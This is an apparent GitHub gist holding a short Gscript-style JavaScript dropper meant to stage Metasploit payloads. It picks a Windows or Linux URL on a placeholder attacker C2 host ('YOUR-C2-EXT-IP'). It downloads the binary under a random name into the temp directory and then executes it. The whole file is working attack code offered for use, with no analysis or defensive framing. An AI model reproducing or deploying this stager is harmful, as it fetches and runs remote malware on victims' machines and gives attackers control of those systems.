| //timeout:150 | |
| //go_import:os as os | |
| function Drop(drop_url, fullpath) { | |
| var headers = {"User-Agent" : "Hello-Lol-Dont-Look-Thx"}; | |
| console.log("Payload destination : " + fullpath); | |
| console.log("Payload source : " + drop_url); | |
| var drop = G.requests.GetURLAsBytes(drop_url, headers, true); | |
| if (drop[2] == null){ | |
| console.log("No errors fetching from source"); | |
| } else { | |
| console.log("errors: "+ drop[2].Errors()); | |
| } | |
| console.log("Writing to file..."); | |
| // response[1] for data | |
| errors = G.file.WriteFileFromBytes(fullpath, drop[1]); | |
| if (errors == null){ | |
| console.log("No errors writing to destination"); | |
| } else { | |
| console.log("errors: "+ drop[2].errors()); | |
| } | |
| return true; | |
| } | |
| function Deploy() { | |
| var final_bin = G.rand.GetAlphaNumericString(6); | |
| var tmppath = os.TempDir(); | |
| // Define your Metasploit delivery URLs here | |
| var windows_url = "http://YOUR-C2-EXT-IP:8080/delivery_tcp_window'"; | |
| var linux_url = "http://YOUR-C2-EXT-IP:8081/delivery_tcp_linux"; | |
| console.log("Detected OS is " + OS); | |
| if (OS == "windows") { | |
| //if windows | |
| fullpath = tmppath+"\\"+final_bin+".exe"; | |
| Drop(windows_url, fullpath); | |
| } else { | |
| //if linux or OSX | |
| fullpath = tmppath+"/"+final_bin; | |
| Drop(linux_url, fullpath); | |
| } | |
| var running = G.exec.ExecuteCommandAsync(fullpath, [""]); | |
| if (running[1] != null) { | |
| console.log("errors: "+running[1].Error()); | |
| } else { | |
| console.log("pid: "+running[0].Process.Pid); | |
| } | |
| console.log("Done."); | |
| return true; | |
| }⏎ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment